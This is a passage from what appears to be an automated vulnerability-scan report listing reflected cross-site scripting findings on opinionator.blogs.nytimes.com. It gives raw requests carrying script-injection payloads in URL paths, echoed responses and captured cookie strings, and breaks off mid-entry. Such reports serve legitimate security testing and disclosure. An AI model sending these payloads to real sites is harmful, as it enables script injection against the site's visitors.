GET /category/dick-cavett/feed57e8a"><script>alert(1)</script>fe172a7552a/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:13:29 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:13:29 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43855
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/dick-cavett/feed57e8a\"><script>alert(1)</script>fe172a7552a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.184. http://opinionator.blogs.nytimes.com/category/dick-cavett/page/2/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/dick-cavett/page/2/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60706"><script>alert(1)</script>51866edec90 was submitted in the REST URL parameter 3. This input was echoed as 60706\"><script>alert(1)</script>51866edec90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/dick-cavett/page60706"><script>alert(1)</script>51866edec90/2/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:18:21 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:18:21 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43877
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/dick-cavett/page60706\"><script>alert(1)</script>51866edec90/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B, ...[SNIP]...
3.185. http://opinionator.blogs.nytimes.com/category/disunion [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/disunion
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83d78"><script>alert(1)</script>084625fe73a was submitted in the REST URL parameter 2. This input was echoed as 83d78\"><script>alert(1)</script>084625fe73a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/disunion83d78"><script>alert(1)</script>084625fe73a HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:25:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:25:14 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion83d78\"><script>alert(1)</script>084625fe73a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.186. http://opinionator.blogs.nytimes.com/category/disunion/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/disunion/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1378a"><script>alert(1)</script>0da3b8f72d1 was submitted in the REST URL parameter 2. This input was echoed as 1378a\"><script>alert(1)</script>0da3b8f72d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/disunion1378a"><script>alert(1)</script>0da3b8f72d1/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:25:18 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:25:18 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion1378a\"><script>alert(1)</script>0da3b8f72d1&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.187. http://opinionator.blogs.nytimes.com/category/disunion/feed/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/disunion/feed/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f948"><script>alert(1)</script>7bb52e55484 was submitted in the REST URL parameter 3. This input was echoed as 6f948\"><script>alert(1)</script>7bb52e55484 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/disunion/feed6f948"><script>alert(1)</script>7bb52e55484/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:22:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:22:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion/feed6f948\"><script>alert(1)</script>7bb52e55484&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.188. http://opinionator.blogs.nytimes.com/category/disunion/page/2/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/disunion/page/2/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf645"><script>alert(1)</script>7bdf5d8d7cb was submitted in the REST URL parameter 3. This input was echoed as bf645\"><script>alert(1)</script>7bdf5d8d7cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/disunion/pagebf645"><script>alert(1)</script>7bdf5d8d7cb/2/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:25:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:25:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43844
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion/pagebf645\"><script>alert(1)</script>7bdf5d8d7cb/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B, ...[SNIP]...
3.189. http://opinionator.blogs.nytimes.com/category/errol-morris [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/errol-morris
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9789f"><script>alert(1)</script>f993fd38ae8 was submitted in the REST URL parameter 2. This input was echoed as 9789f\"><script>alert(1)</script>f993fd38ae8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/errol-morris9789f"><script>alert(1)</script>f993fd38ae8 HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:21:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:21:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43811
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris9789f\"><script>alert(1)</script>f993fd38ae8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.190. http://opinionator.blogs.nytimes.com/category/errol-morris/feed/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/errol-morris/feed/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ca0"><script>alert(1)</script>a5cfaeb2d66 was submitted in the REST URL parameter 3. This input was echoed as 83ca0\"><script>alert(1)</script>a5cfaeb2d66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/errol-morris/feed83ca0"><script>alert(1)</script>a5cfaeb2d66/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:18:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:18:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris/feed83ca0\"><script>alert(1)</script>a5cfaeb2d66&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.191. http://opinionator.blogs.nytimes.com/category/errol-morris/page/2/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/errol-morris/page/2/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59656"><script>alert(1)</script>2a52a42ee88 was submitted in the REST URL parameter 3. This input was echoed as 59656\"><script>alert(1)</script>2a52a42ee88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/errol-morris/page59656"><script>alert(1)</script>2a52a42ee88/2/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:22:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:22:17 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris/page59656\"><script>alert(1)</script>2a52a42ee88/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B, ...[SNIP]...
3.192. http://opinionator.blogs.nytimes.com/category/fixes [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/fixes
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e161d"><script>alert(1)</script>0900389e500 was submitted in the REST URL parameter 2. This input was echoed as e161d\"><script>alert(1)</script>0900389e500 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fixese161d"><script>alert(1)</script>0900389e500 HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:25:45 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:25:45 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixese161d\"><script>alert(1)</script>0900389e500&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.193. http://opinionator.blogs.nytimes.com/category/fixes/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/fixes/
Issue detail
